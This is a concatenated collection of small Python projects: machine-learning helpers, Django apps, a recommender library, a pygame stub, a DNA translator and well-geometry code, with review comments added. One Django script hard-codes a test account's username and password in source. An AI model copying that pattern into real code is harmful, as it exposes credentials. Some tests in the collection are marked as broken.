    """Fit a decision tree (min leaf size prompted); return [accuracy %, pickled model]."""
    leaf = int(input("Enter the number of classes for deccision tree algorithm. :"))
    clf = DecisionTreeClassifier(min_samples_leaf=leaf)
    clf.fit(xTrain, yTrain)
    score_pct = accuracy_score(yTest, clf.predict(xTest)) * 100
    return [score_pct, pickle.dumps(clf)]
def random_forest(xTrain, yTrain, xTest, yTest):
    """Fit a random forest (estimator count prompted); return [accuracy %, pickled model]."""
    estimators = int(input("Enter the number of estimators for random forest algorithm. :"))
    clf = RandomForestClassifier(n_estimators=estimators)
    clf.fit(xTrain, yTrain)
    score_pct = accuracy_score(yTest, clf.predict(xTest)) * 100
    return [score_pct, pickle.dumps(clf)]
def svm(xTrain, yTrain, xTest, yTest):
    """Fit an SVM (kernel name prompted); return [accuracy %, pickled model]."""
    kernel_fn = input("Enter the kernal function SVM algorithm. :")
    clf = SVC(kernel=kernel_fn)
    clf.fit(xTrain, yTrain)
    score_pct = accuracy_score(yTest, clf.predict(xTest)) * 100
    return [score_pct, pickle.dumps(clf)]
--- FILE SEPARATOR ---
import sklearn
import pandas as pd
import pickle
from sklearn.cluster import KMeans
from sklearn.cluster import AgglomerativeClustering
from sklearn.cluster import SpectralClustering
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
def data_split(dataSet, spliSize = 0.33, yCol = -1): #Splitting the dataset for the model.
    """Split a CSV into train/test features and labels.

    '?' cells become the -9999 sentinel. Returns xTrain, xTest, yTrain, yTest.
    """
    frame = pd.read_csv(dataSet, header=0)
    frame.replace('?', -9999, inplace=True)  # sentinel for unknown values
    labels = frame.iloc[:, yCol]
    features = frame.iloc[:, :yCol]
    return train_test_split(features, labels, test_size=spliSize)
def cluster(dataSet, yCol = -1):
    """Run the three clustering algorithms and report the most "accurate".

    Returns:
        (algorithmName, highAccuracy, savedModel).
    """
    spliSize = float(input("Enter the size of the testing dataset : ")) #User input for the testing size.
    xTrain, xTest, yTrain, yTest = data_split(dataSet, spliSize, yCol)
    algoDict = {0: "k_means Clustering", 1: "Spectral Clustering", 2: "Agglomerative Clustering"}
    accuracyList = []
    results = []
    clusters = int(input("Enter the number of clusters : "))
    results.append(k_means(xTrain, xTest, yTest, clusters))
    # BUG FIX: spectral_cluster was never called, so `results` had only two
    # entries while the loop below read three (IndexError), and the
    # agglomerative result at index 1 was mislabeled "Spectral Clustering".
    results.append(spectral_cluster(xTrain, xTest, yTest, clusters))
    results.append(agglomerative_cluster(xTrain, xTest, yTest, clusters))
    for i in range(0,3):
        accuracyList.append(results[i][0])
    highAccuracy = max(accuracyList) #Calculating the highest accuracy.
    algorithmName = algoDict[accuracyList.index(highAccuracy)]
    savedModel = results[accuracyList.index(highAccuracy)][1]
    return algorithmName, highAccuracy, savedModel
'''
Main Computation
'''
def k_means(xTrain, xTest, yTest, clusters):
    """Fit KMeans on the training split and score its test-split labels.

    Returns:
        [accuracy %, pickled fitted model].
    """
    km = KMeans(n_clusters = clusters)
    km.fit(xTrain)
    # BUG FIX: fit_predict(xTest) RE-FIT the model on the test split, silently
    # discarding the training fit above; predict() uses the trained centroids.
    xKmean = km.predict(xTest)
    # NOTE(review): cluster labels are compared to y as-is; label numbering is
    # arbitrary, so treat this "accuracy" as a rough proxy only.
    acc = accuracy_score(yTest, xKmean)
    accuracy = acc*100
    save_kmeans_model = pickle.dumps(km)
    return [accuracy, save_kmeans_model]
def spectral_cluster(xTrain, xTest, yTest, clusters):
    """Cluster the test split with spectral clustering; return [accuracy %, pickled model].

    NOTE(review): SpectralClustering exposes no predict(); fit_predict(xTest)
    below re-clusters the test split from scratch, so the fit(xTrain) result is
    effectively discarded — confirm whether the training-split fit is needed.
    """
    sc = SpectralClustering(n_clusters = clusters)
    sc.fit(xTrain)
    xSpecClu = sc.fit_predict(xTest)
    # NOTE(review): raw cluster labels are compared to y; label numbering is
    # arbitrary, so this "accuracy" is only a rough proxy.
    acc = accuracy_score(yTest, xSpecClu)
    accuracy = acc*100
    save_specclu_model = pickle.dumps(sc)
    return [accuracy, save_specclu_model]
def agglomerative_cluster(xTrain, xTest, yTest, clusters):
    """Cluster the test split with agglomerative clustering; return [accuracy %, pickled model].

    NOTE(review): AgglomerativeClustering exposes no predict(); fit_predict
    below re-fits on the test split, so the fit(xTrain) result is effectively
    discarded — confirm whether the training-split fit is needed.
    """
    aggc = AgglomerativeClustering(n_clusters = clusters)
    aggc.fit(xTrain)
    xAggC = aggc.fit_predict(xTest)
    # NOTE(review): raw cluster labels are compared to y; label numbering is
    # arbitrary, so this "accuracy" is only a rough proxy.
    acc = accuracy_score(yTest, xAggC)
    accuracy = acc * 100
    save_agg_model = pickle.dumps(aggc)
    return [accuracy, save_agg_model]
|
[
"/algoRecommender.py",
"/supervised.py",
"/unsupervised.py"
] |
00Starlord00/Image_Density_Calculation
|
import os
from imageai.Detection import ObjectDetection
import tensorflow
import keras
def crowdCount(input_image,
               execution_path='C:\\Users\\Pranav\\Documents\\Projects\\FinalYear\\Models',
               input_path='C:\\Users\\Pranav\\Documents\\Projects\\FinalYear\\FrontEnd\\media',
               output_path='C:\\Users\\Pranav\\Documents\\Projects\\FinalYear\\FrontEnd\\media'):
    '''
    Detect people in an image with a RetinaNet model and return the count.

    GENERALIZATION: the three machine-specific paths are now parameters with
    the original hard-coded values as defaults, so existing callers are
    unaffected while other deployments can override them.

    Args:
        input_image: file name (not full path) of the image to analyze.
        execution_path: directory holding the saved model weights.
        input_path: Django media directory containing the input image.
        output_path: Django media directory for the annotated output image.

    Returns:
        (people_count, output_image): number of detected persons and the
        annotated output image's file name.
    '''
    detector = ObjectDetection()
    detector.setModelTypeAsRetinaNet()
    detector.setModelPath(os.path.join(execution_path, "resnet50_coco_best_v2.0.1.h5"))
    detector.loadModel()
    # Output is written next to the input, prefixed so it never collides.
    output_image = '_'.join(["output", input_image])
    objects_present = detector.CustomObjects(person = True)
    detections = detector.detectCustomObjectsFromImage(
        custom_objects = objects_present,
        input_image = os.path.join(input_path, input_image),
        output_image_path = os.path.join(output_path, output_image),
        minimum_percentage_probability = 29)  # empirically-chosen confidence floor
    people_count = len(detections)
    return people_count, output_image
'''
input_image = 'IMG_1.jpg'
total_count = crowdCount(input_image)
print('Number of people: ', total_count)
'''
--- FILE SEPARATOR ---
import os
import requests
from .mainProcess import crowdCount
import sys
from subprocess import run, PIPE
from django.shortcuts import render
from django.http import HttpResponse
from django.core.files.storage import FileSystemStorage
def index(request):
    """Render the upload-form landing page."""
    return render(request, 'index.html')
def dataProcess(request):
    """Handle an uploaded image: save it, run crowdCount, render the results."""
    uploaded = request.FILES['images']
    storage = FileSystemStorage()
    saved_name = storage.save(uploaded.name, uploaded)
    input_url = storage.url(saved_name)
    total_count, output_name = crowdCount(saved_name)
    output_url = storage.url(output_name)
    context = {"count": total_count, "input_data": str(input_url), "output_data": str(output_url)}
    return render(request, 'index.html', context)
|
[
"/mainProcess.py",
"/views.py"
] |
00arun00/PyRate
|
def readGz(f):
    """Yield one parsed record per line of a gzipped file of Python-literal dicts.

    SECURITY FIX: the original ran eval() on every line, which executes
    arbitrary code embedded in the data file; ast.literal_eval accepts only
    Python literals and is the safe equivalent for this data.
    """
    import gzip
    import ast
    for l in gzip.open(f):
        # gzip.open in binary mode yields bytes; decode before parsing.
        yield ast.literal_eval(l.decode() if isinstance(l, bytes) else l)
def amazon_purchase_review(f_name='Data/assignment1/train.json.gz', test_size=0.5):
    '''
    Loads the amazon purchase review data.

    GENERALIZATION: the data path and split fraction were hard-coded; they are
    now parameters whose defaults preserve the original behavior.

    Args:
        f_name: path to the gzipped training data.
        test_size: fraction of rows held out as the test split.

    Returns:
        x_train, y_train, x_test, y_test — (itemID, reviewerID) pairs and ratings.
    '''
    import pandas as pd
    from sklearn.model_selection import train_test_split as tts
    # (FIX: dropped an unused local `import numpy as np`.)
    df = pd.DataFrame(readGz(f_name))[['itemID','reviewerID','rating']]
    data = df.values
    x = data[:,:2]
    y = data[:,2:]
    x_train,x_test,y_train,y_test = tts(x,y,test_size = test_size)
    return x_train,y_train,x_test,y_test
--- FILE SEPARATOR ---
import numpy as np
class Metric(object):
    '''
    Abstract base class for evaluation metrics.

    Subclasses implement the static score() method and set self.eval_metric
    (their display name) in __init__; instances are callable.
    '''
    @staticmethod
    def score(Y_hat, Y):
        '''
        Returns the score based on the eval metric.

        Args:
            :Y_hat (numpy.ndarray): Predicted values
            :Y (numpy.ndarray): Labels
        Returns:
            :error (float): Score
        '''
        raise NotImplementedError('Abstract class')

    def __call__(self, Y_hat, Y):
        # Calling a metric instance is shorthand for score().
        return self.score(Y_hat, Y)

    def __repr__(self):
        # EAFP: subclasses define eval_metric in __init__; fail loudly otherwise.
        try:
            return f'{self.eval_metric}'
        except AttributeError:
            raise NotImplementedError('pretty print not implemented')
class RMSE(Metric):
    '''
    Root Mean Square Error.
    '''
    def __init__(self):
        # Display name used by Metric.__repr__.
        self.eval_metric = "RMSE"

    @staticmethod
    def score(Y_hat, Y):
        '''
        Returns the root-mean-square error between predictions and labels.

        Args:
            :Y_hat (numpy.ndarray): Predicted values
            :Y (numpy.ndarray): Labels
        Returns:
            :error (float): Score based on RMSE
        '''
        diff = Y_hat - Y
        return np.sqrt(np.mean(diff ** 2))
class MSE(Metric):
    '''
    Mean Square Error.
    '''
    def __init__(self):
        # Display name used by Metric.__repr__.
        self.eval_metric = "MSE"

    @staticmethod
    def score(Y_hat, Y):
        '''
        Returns the mean squared error between predictions and labels.

        Args:
            :Y_hat (numpy.ndarray): Predicted values
            :Y (numpy.ndarray): Labels
        Returns:
            :error (float): Score based on MSE
        '''
        diff = Y_hat - Y
        return np.mean(diff ** 2)
class SSE(Metric):
    '''
    Sum of Square Error.
    '''
    def __init__(self):
        # Display name used by Metric.__repr__.
        self.eval_metric = "SSE"

    @staticmethod
    def score(Y_hat, Y):
        '''
        Returns the sum of squared errors between predictions and labels.

        Args:
            :Y_hat (numpy.ndarray): Predicted values
            :Y (numpy.ndarray): Labels
        Returns:
            :error (float): Score based on SSE
        '''
        diff = Y_hat - Y
        return np.sum(diff ** 2)
class MAE(Metric):
    '''
    Mean Absolute Error
    '''
    def __init__(self):
        # Display name used by Metric.__repr__.
        self.eval_metric = "MAE"
    @staticmethod
    def score(Y_hat,Y):
        '''
        Returns the score based on mean absolute error.

        Args:
            :Y_hat (numpy.ndarray): Predicted values
            :Y (numpy.ndarray): Labels
        Returns:
            :error (float): Score based on MAE
        '''
        # BUG FIX: the original computed np.mean(np.abs((Y_hat-Y)**2)) — the
        # mean of SQUARED errors (squares are already non-negative, so the abs
        # was a no-op and the result was MSE, not MAE).
        error = np.mean(np.abs(Y_hat - Y))
        return error
# Lowercase aliases so callers can reference the metric CLASSES (not
# instances) in either case.
rmse = RMSE
mse = MSE
sse = SSE
mae = MAE
--- FILE SEPARATOR ---
import numpy as np
import warnings
from eval_metrics import Metric
class Model(object):
    '''
    Recomender System model to be used
    **Note**
    This is a base class and cannot be used to make predictions
    (fit() is abstract; the base _predict_single_ returns random ratings).
    '''

    def __call__(self, X):
        '''Calling the model is shorthand for predict().'''
        return self.predict(X)

    def __repr__(self):
        '''Pretty print: the model name when a subclass sets one.'''
        if hasattr(self, 'model_name'):
            return f'{self.model_name}'
        return 'Not implemented'

    def _predict_single_(self, x):
        '''Predict one rating; the base class draws uniformly from [0, 5).'''
        return np.random.uniform(0, 5)

    def predict(self, X):
        '''
        Predict Function

        Args:
            :X (numpy.ndarray): User, Item pairs to predict rating on
        Retruns:
            :predicted_rating (numpy.ndarray): column vector of predicted ratings
        '''
        ratings = [self._predict_single_(row) for row in X]
        return np.array(ratings).reshape(-1, 1)

    def set_eval_metric(self, metric):
        '''
        Sets evaluation metric

        Args:
            :metric (Metric): evaluation metric used
        '''
        assert isinstance(metric, Metric)
        self.eval_metric = metric

    def score(self, X, Y):
        '''
        Predicts the score based on set eval metric

        Args:
            :X (numpy.ndarray): Input
            :Y (numpy.ndarray): Labels
        Retruns:
            :score (float): score based on the selected eval metric
        '''
        y_pred = self.predict(X)
        if not hasattr(self, 'eval_metric'):
            raise KeyError("Please add eval_metric")
        return self.eval_metric(y_pred, Y)

    def fit(self, X, Y):
        '''Fits model to the data; subclasses must override.'''
        raise NotImplementedError('This is an abstract class')
class Baseline(Model):
    '''
    Baseline model: predicts the global mean rating for every input.
    '''
    def __init__(self):
        self.model_name = 'Baseline'
        self.alpha = 0          # global mean rating, learned in fit()
        self.fit_flag = False   # True once fit() has been called
    # FIX: removed a __call__ override that was byte-for-byte identical to
    # Model.__call__ — dead duplication; inherited behavior is the same.
    def _predict_single_(self, X):
        '''Return the learned mean rating; warn (per call) when unfit.'''
        if not self.fit_flag:
            # FIX: was an f-string with no placeholders.
            warnings.warn('Model currently not fit, predicting 0 for all')
        return self.alpha
    def fit(self, X, Y):
        '''
        Fits model to the data: alpha becomes the mean of all observed ratings.
        '''
        self.alpha = np.mean(Y)
        self.fit_flag = True
--- FILE SEPARATOR ---
import data_loader
import eval_metrics
import models
|
[
"/data_loader.py",
"/eval_metrics.py",
"/models.py",
"/pyrate.py"
] |
00ba/LIST
|
'''
Created on Sep 8, 2016
'''
class Cell:
    """A cons cell backed by a two-slot list: [car, cdr]."""

    def __init__(self):
        self.cell = []

    def get_car(self):
        """Pop and return the first element (destructive read of the car)."""
        return self.cell.pop(0)

    def set_car(self, n):
        """Insert n at the front of the cell."""
        self.cell.insert(0, n)

    def get_cdr(self):
        """Pop and return the last element (destructive read of the cdr)."""
        return self.cell.pop()

    def set_cdr(self, n):
        """Append n as the cell's tail."""
        self.cell.append(n)
class List(Cell):
    """A LISP-style list built by chaining cons cells from a root Cell."""
    def __init__(self):
        self.root = Cell()
    def get_list(self):
        # BUG FIX: this only printed and implicitly returned None, yet
        # test_list.py compares its result to the nested structure; it now
        # returns the structure as well (backward compatible — callers that
        # ignored the old None are unaffected).
        print(self.root.cell)
        return self.root.cell
    def set_list(self, *args):
        """Cons each argument onto the front of the list; returns the new root."""
        for arg in args:
            if self.root.cell == []:
                self.root = cons(arg)
            else:
                self.root = cons(arg, self.root.cell)
        return self.root
def cons(a, b = None):
    """Build and return a fresh cons cell with car a and cdr b."""
    fresh = Cell()
    fresh.set_car(a)
    fresh.set_cdr(b)
    return fresh
def atom(a):
    """Return True when a is an atom (int or str), False otherwise.

    BUG FIX: the original's else branch evaluated the bare expression `False`
    without returning it, so non-atoms yielded None instead of False.
    """
    if isinstance(a, int):
        return True
    elif isinstance(a, str):
        return True
    else:
        return False
def eq(a, b):
    """LISP-style equality predicate: True when a equals b, else False."""
    return bool(a == b)
--- FILE SEPARATOR ---
from list import *
# Smoke-test driver: build the list 1,2,3 and print its nested representation.
if __name__ == '__main__':
    mylist = List()
    mylist.set_list(1, 2, 3)
    mylist.get_list()
--- FILE SEPARATOR ---
'''
Created on Sep 8, 2016
'''
from list import *
import unittest
class Test(unittest.TestCase):
    """Unit tests for list.py.

    NOTE(review): several assertions look broken as written:
      - `box.cons(1, 2)` treats the module-level function cons() as a List
        method, which List does not define — TODO confirm intent.
      - get_list() prints and returns None, so the final assertEquals
        compares None against the expected nested structure.
      - assertEquals is the deprecated alias of assertEqual.
    """
    def test_list(self):
        box = List()
        box = box.cons(1, 2)
        self.assertEquals(box.root.get_car(),1)
        self.assertEquals(box.root.get_cdr(),2)
        self.assertTrue(atom(1))
        self.assertTrue(atom('two'))
        self.assertFalse(atom([1, 2]))
        self.assertTrue(eq(1, 1))
        self.assertFalse(eq(1, 2))
        mylist = List()
        mylist.set_list(1, 2, 3)
        mylist.get_list()
        self.assertEquals(mylist.get_list(), [3, [2, [1, None]]])
# Run the suite when executed directly.
if __name__ == "__main__":
    #import sys;sys.argv = ['', 'Test.test_list']
    unittest.main()
|
[
"/list.py",
"/main.py",
"/test_list.py"
] |
00ba/code_inbox
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
AccessからPostgreSQLにエクスポートされたmobileテーブルには、
すでに削除されたFittingやRecommendのデータが、"データ有"のマークのまま残っている。
この修復作業を行い、PostgreSQL上のデータを正しい状態にする。
"""
import os, sys
from string import Template
from django.conf import settings
sys.path.append(os.pardir) # pardir = parent directory (so crz.settings resolves)
os.environ['DJANGO_SETTINGS_MODULE']="crz.settings"
# Force UTF-8 so output renders without errors even on a Kterm running LANG=ja_JP.eucJP.
os.environ['LANG']="ja_JP.UTF-8"
from django.test import TestCase
from django.test.client import Client
from django.http import Http404
from fitting.models import Mobile
class Mobile_icon_list():
    """Wraps the full set of fitting.models.Mobile records and builds
    link-check URLs from them."""
    def __init__(self):
        """
        Fetch all Mobile records (ordered by num) when the instance is created.
        """
        # BUG FIX: the query result was bound to a LOCAL variable `records`,
        # so self.records (used by trim_record and the __main__ driver) never
        # existed and raised AttributeError.
        self.records = Mobile.objects.order_by('num').all()
    def get_url(self, matched_key, record):
        """
        Build the link-test URL for one record.

        Example:
        record = {'yid': u'201112-201411', 'num': 149190, 'recomm':None, 'mkid': 7, 'car': u'\u30a4\u30f3\u30d7\u30ec\u30c3\u30b5G4\uff08H23/12\u301cH26/11\uff09', 'after': 12010, 'pulse': 2, 'disasm': 2,'subid': u'G4', 'fitting': 2, 'gid': u'SB0000400', 'jfpdf': 2}
        tmp_list = Mobile_icon_list()
        tmp_list.get_url('jfpdf', record)
        u'/jfpdf/SB0000400%5EG4_201112-201411/'
        """
        if record['subid'] is None:
            url = Template('/$key/${gid}_$yid/')
            return url.substitute(key= matched_key, gid = record['gid'], yid = record['yid'])
        else:
            # %5E is the URL-encoded '^' separating gid and subid.
            url = Template('/$key/${gid}%5E${subid}_$yid/')
            return url.substitute(key= matched_key, gid = record['gid'],subid= record['subid'] ,yid = record['yid'])
    def trim_record(self):
        """
        Delete every record whose jfpdf, fitting, recomm, pulse and disasm
        fields are ALL None, printing record counts before and after.
        """
        print("処理前レコード数")
        print(self.records.count())
        print("削除レコード数")
        # Build the "all five fields empty" queryset once and reuse it for the
        # count and the delete (the original repeated the filter chain).
        empties = self.records.filter(jfpdf=None).filter(fitting=None).filter(recomm=None).filter(pulse=None).filter(disasm=None)
        print(empties.count())
        empties.delete()
        print("処理後レコード数")
        print(self.records.count())
class Mobile_link_test(TestCase):
    def mobile_link_test(self, url):
        """
        Check whether the URL generated from a field actually resolves.

        Returns the HTTP status code for *url* (e.g. 404 for a missing page):
        url = '/jspdf/TY0000000_201204-999999/'
        test = Mobile_link_test('mobile_link_test')
        test.mobile_link_test(url)
        404
        """
        # Log in first
        client = Client()
        # ************** user/password ***************
        # NOTE(review): credentials are hard-coded in source -- consider
        # moving them into settings or an environment variable.
        client.login(username="tester", password="5aGtEagk")
        response = client.get(url)
        return response.status_code
if __name__ == '__main__':
    """
    records: QuerySet of all Mobile rows
    record:  one row as a dict
    key:     field name (str)
    For every field in (jfpdf, fitting, recomm, pulse, disasm) that holds a
    value, generate its URL and test the link.  Fields whose link answers
    404 are reset to None; afterwards trim_record() drops rows that became
    completely empty.
    """
    test = Mobile_link_test('mobile_link_test')
    tmp_list = Mobile_icon_list()
    # Only these fields carry link data worth testing.
    target_keys = ['jfpdf', 'fitting', 'recomm', 'pulse', 'disasm']
    for record in tmp_list.records.values():
        for key in target_keys:
            if record.get(key) is None:
                continue
            url = tmp_list.get_url(key, record)
            # BUG FIX: mobile_link_test() *returns* the status code, it does
            # not raise -- the old ``except 404:`` could never fire (and an
            # int literal is not a valid exception class anyway).  Also
            # ``self`` does not exist at module level; the queryset lives on
            # tmp_list.records.
            if test.mobile_link_test(url) == 404:
                tmp_list.records.filter(num=record['num']).update(**{key: None})
    tmp_list.trim_record()
    import doctest
    doctest.testmod()
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: utf-8
from IconList import *
import unittest
import urllib
from urllib2 import HTTPError
from string import Template
# test data
r1 = {"num":3825, "gid":'TY0000050', "yid":'201204-999999', "jfpdf":2,
      "fitting":'', "recomm":'', "pulse":'', "disasm":''}
r2 = {"num":3825, "gid":'TY0000050', "yid":'201204-999999', "jfpdf":'null',
      "fitting":'null', "recomm":'null', "pulse":'null',
      "disasm":'null'}
# NOTE(review): instantiating here queries the database at import time.
tmp_list = Mobile_icon_list()
url = '/jfpdf//TY0000050_201204-999999/'
key = 'jspdf'
class Test(unittest.TestCase):
    # def test_set_null(self):
    #     self.assertEquals(set_null(r, key), )
    def test_set_null(self):
        # NOTE(review): Mobile_icon_list defines no set_null method and the
        # expected value 'foo' looks like a placeholder -- this test cannot
        # pass as written.
        self.assertEquals(tmp_list.set_null(key, url), 'foo')
# Run the unit tests when this module is executed directly.
if __name__ == "__main__":
    #import sys;sys.argv = ['', 'Test.test_list']
    unittest.main()
|
[
"/IconList.py",
"/test_IconList .py"
] |
00fatal00-dev/rpg-python
|
import pygame,sys
from player import Player

# BUG FIX: pygame.init() was never called before using display/event modules.
pygame.init()

screen_size = (800, 600)
screen = pygame.display.set_mode(screen_size)
pygame.display.set_caption("Game")
running = True

#Initiating player
player = Player(0, 0, 32, 32, (255, 0, 0), .075, 0, 0)

while running:
    # Apply the current velocity every frame.
    player.x += player.move_x
    player.y += player.move_y
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            pygame.quit()  # release the display before exiting
            sys.exit()
        #Checking player movement
        if event.type == pygame.KEYDOWN:
            if event.key == pygame.K_w:
                player.move_y = -player.move_speed
            elif event.key == pygame.K_s:
                player.move_y = player.move_speed
            # BUG FIX: A/D used "-="/"+=" while W/S assigned, so repeated
            # key events accumulated speed; assign like the vertical axis.
            elif event.key == pygame.K_a:
                player.move_x = -player.move_speed
            elif event.key == pygame.K_d:
                player.move_x = player.move_speed
        elif event.type == pygame.KEYUP:
            if event.key in (pygame.K_w, pygame.K_s):
                player.move_y = 0
            elif event.key in (pygame.K_a, pygame.K_d):
                player.move_x = 0
    screen.fill((0, 255, 0))
    #Draw player
    pygame.draw.rect(screen, player.colour, (player.x, player.y, player.width, player.height), 0)
    pygame.display.update()
--- FILE SEPARATOR ---
import pygame
import json
class Player():
    """A movable rectangular player with a position, colour, speed and stats."""

    def __init__(self, x, y, width, height, colour, move_speed, move_x, move_y):
        self.x = x                    # top-left position
        self.y = y
        self.width = width
        self.height = height
        self.colour = colour          # RGB tuple used when drawing
        self.move_speed = move_speed  # pixels per frame while a key is held
        self.move_x = move_x          # current velocity components
        self.move_y = move_y
        self.stats = {
            'health': 100
        }

    def set_stats(self, stat_to_set, new_value):
        """Set stat *stat_to_set* to *new_value*.

        BUG FIX: this was an empty stub (``pass``), so stats could never change.
        """
        self.stats[stat_to_set] = new_value

    def get_stats(self, stat_to_get):
        """Return the current value of *stat_to_get* (KeyError if unknown)."""
        return self.stats[stat_to_get]
|
[
"/main.py",
"/player.py"
] |
00mjk/DNA_transcription_translation
|
# Standard RNA codon table, built once from codon groups that share an acid.
_ACID_BY_CODON = {
    codon: acid
    for codons, acid in (
        ("GUU GUC GUA GUG", "Valine"),
        ("GCU GCC GCA GCG", "Alanine"),
        ("GAU GAC", "Aspartic Acid"),
        ("GAA GAG", "Glutamic Acid"),
        ("GGU GGC GGA GGG", "Glycine"),
        ("UUU UUC", "Phenylalanine"),
        ("UUA UUG CUU CUC CUA CUG", "Leucine"),
        ("UCU UCC UCA UCG AGU AGC", "Serine"),
        ("UAU UAC", "Tyrosine"),
        ("UAA UAG UGA", "STOP"),
        ("UGU UGC", "Cysteine"),
        ("UGG", "Tryptophan"),
        ("CCU CCC CCA CCG", "Proline"),
        ("CAU CAC", "Histidine"),
        ("CAA CAG", "Glutamine"),
        ("CGU CGC CGA CGG AGA AGG", "Arginine"),
        ("AUU AUC AUA", "Isoleucine"),
        ("AUG", "Methionine"),
        ("ACU ACC ACA ACG", "Threonine"),
        ("AAU AAC", "Asparagine"),
        ("AAA AAG", "Lysine"),
    )
    for codon in codons.split()
}


def codons_to_acids(list_of_codons):
    """Map each RNA codon to its amino-acid name ("STOP" for stop codons).

    Replaces the original 64-branch if chain with a table lookup.  Unknown
    entries (e.g. a trailing partial codon) are skipped, matching the
    original behaviour of appending nothing for unmatched codons.
    """
    return [_ACID_BY_CODON[codon] for codon in list_of_codons if codon in _ACID_BY_CODON]
--- FILE SEPARATOR ---
#This program turns a strand of DNA into mRNA, which is then converted into amino acids using a codon chart
#MIT License as usual
#Ravi Shah 2020
from amino_acids import codons_to_acids
# Module-level default; find_stop() below rebinds its own local name, so this
# is only a fallback value at module scope.
stop_index = "NaN"
def transcription(dna):
    """Transcribe a DNA template strand into an mRNA string.

    Each base maps to its RNA complement (G->C, C->G, A->U, T->A).
    Characters outside GCAT are silently dropped, matching the original
    if/elif chain that had no fallback branch.
    """
    complement = {"G": "C", "C": "G", "A": "U", "T": "A"}
    return ''.join(complement[base] for base in dna if base in complement)
def find_start(mrna):
    """Return *mrna* from the first start codon (AUG) onward.

    Prints a message and exits the program if no start codon exists.
    """
    try:
        start_index = mrna.index("AUG")
    except ValueError:
        # BUG FIX: the bare ``except`` also swallowed SystemExit,
        # KeyboardInterrupt and programming errors; only a missing
        # substring (ValueError from str.index) should trigger the exit.
        print("Please enter a valid DNA strand with a start codon.")
        quit()
    return mrna[start_index:]
def find_stop(mrna):
    """Return the index of the first STOP codon in the codon list *mrna*.

    BUG FIXES versus the original:
    - it kept scanning after a match, so a later stop codon of a different
      type silently overwrote the result;
    - the "found" message was printed once per matching codon;
    - with no stop codon present, ``return stop_index`` raised
      UnboundLocalError; now a clear ValueError is raised instead.
    """
    stop_codons = ("UAA", "UAG", "UGA")
    for index, codon in enumerate(mrna):
        if codon in stop_codons:
            print(codon, "STOP codon found")
            return index
    raise ValueError("No STOP codon found in mRNA strand.")
def break_into_codons(mrna):
    """Split the mRNA string into consecutive chunks of three bases.

    The final chunk may be shorter than three characters.
    """
    width = 3
    chunks = []
    for start in range(0, len(mrna), width):
        chunks.append(mrna[start:start + width])
    return chunks
def truncate(codons, stop_index):
    """Return the codons up to and including position *stop_index*."""
    return codons[:stop_index + 1]
def translation(final_codons):
    """Translate the codon list into amino acids and report how many resulted."""
    print("The codons are:", final_codons)
    acids = codons_to_acids(final_codons)
    print("There are", len(acids), "amino acids translated from this mRNA strand.")
    return acids
# Interactive driver: read a DNA strand, transcribe it, locate the open
# reading frame (start codon to first stop codon) and print the amino acids.
strand = input("Enter the DNA strand to be transcribed and translated: ")
strand = strand.upper()
messenger_rna = transcription(strand)
with_start = find_start(messenger_rna)
into_codons = break_into_codons(with_start)
stop_index = find_stop(into_codons)
final_codons = truncate(into_codons, stop_index)
amino_acids_list = translation(final_codons)
print(amino_acids_list)
|
[
"/amino_acids.py",
"/converter.py"
] |
00mjk/EarthSciPy
|
# -*- coding: utf-8 -*-
# :repository: https://github.com/postpdm/EarthSciPy
from earthscipy.wells import *
__version__ = '0.0.0'
__author__ = 'YN.Coder'
# Explicit public API; currently empty, so ``from earthscipy import *``
# re-exports nothing beyond what the wells wildcard import brings in.
__all__ = [
]
--- FILE SEPARATOR ---
from math import cos, sin, radians
def Cos_Dg( A_Dg ):
    """Cosine of an angle given in degrees."""
    angle_rad = radians(A_Dg)
    return cos(angle_rad)
def Sin_Dg( A_Dg ):
    """Sine of an angle given in degrees."""
    angle_rad = radians(A_Dg)
    return sin(angle_rad)
class StaticDot3D:
    """A single point in 3D space with X/Y/Z coordinates."""
    # Class-level defaults, kept for backward compatibility.
    X = 0
    Y = 0
    Z = 0

    def __init__(self, arg_X, arg_Y, arg_Z):
        # Store all three coordinates on the instance.
        self.X, self.Y, self.Z = arg_X, arg_Y, arg_Z
class WellGeometryStep():
    """One step of clinometry (inclinometry) data."""
    # raw inclinometry constants
    inclination = 0  # step length in metres
    vertical = 0     # in degrees
    tangent = 0      # in degrees
    # well length accumulated before this step
    start_length = 0
    # computed end point of the step
    end_dot = None  # type StaticDot3D

    def __init__(self, arg_start_dot, arg_inclination, arg_vertical = 0, arg_tangent = 0, arg_start_length = 0 ):  # no default value for arg_inclination
        # keep the raw inclination vector
        self.inclination = arg_inclination
        self.vertical = arg_vertical
        self.tangent = arg_tangent
        # keep the start length
        self.start_length = arg_start_length
        # project the step onto the three axes (first, primitive variant)
        delta_x = arg_inclination * Cos_Dg( self.vertical ) * Cos_Dg( self.tangent )
        delta_y = arg_inclination * Sin_Dg( self.vertical ) * Cos_Dg( self.tangent )
        delta_z = arg_inclination * Sin_Dg( self.tangent )
        self.end_dot = StaticDot3D( arg_start_dot.X + delta_x,
                                    arg_start_dot.Y + delta_y,
                                    arg_start_dot.Z + delta_z )
class BaseWell():
    """Base well class: a named wellhead plus a list of geometry steps."""
    wellname = ''
    wellhead = None  # StaticDot3D
    # geometry - list of WellGeometryStep, created per instance in __init__
    well_length = 0
    wellfield = None

    def __init__(self, arg_wellname = '', arg_wellhead_X = 0, arg_wellhead_Y = 0, arg_wellhead_Z = 0 ):
        self.geometry = []
        self.wellname = arg_wellname
        self.wellhead = StaticDot3D( arg_wellhead_X, arg_wellhead_Y, arg_wellhead_Z )

    def add_geometry_step(self, arg_inclination, arg_vertical = 0, arg_tangent = 0 ):  # no default value for arg_inclination
        """Append one inclinometry step and grow the total well length."""
        step = WellGeometryStep( self.End_Dot(), arg_inclination, arg_vertical, arg_tangent, self.well_length )
        self.geometry.append( step )
        self.well_length += arg_inclination

    def End_Dot( self ):
        """Last known point of the well: the last step's end, else the wellhead."""
        if self.geometry:
            return self.geometry[-1].end_dot
        return self.wellhead
class Well(BaseWell):
    """Well class"""
    # Known vertical datums a well elevation may be referenced to.
    datums = [ 'Baltic', 'NAD27', 'NAD83', 'Ordnance Datum Newlyn', 'Normalhöhennull', 'ETRS1989', 'AOD', 'TUDKA-99' ]
class WellField():
    """A named collection of wells with a tracked 3D bounding box."""

    field_name = ''

    def __init__(self, arg_field_name):
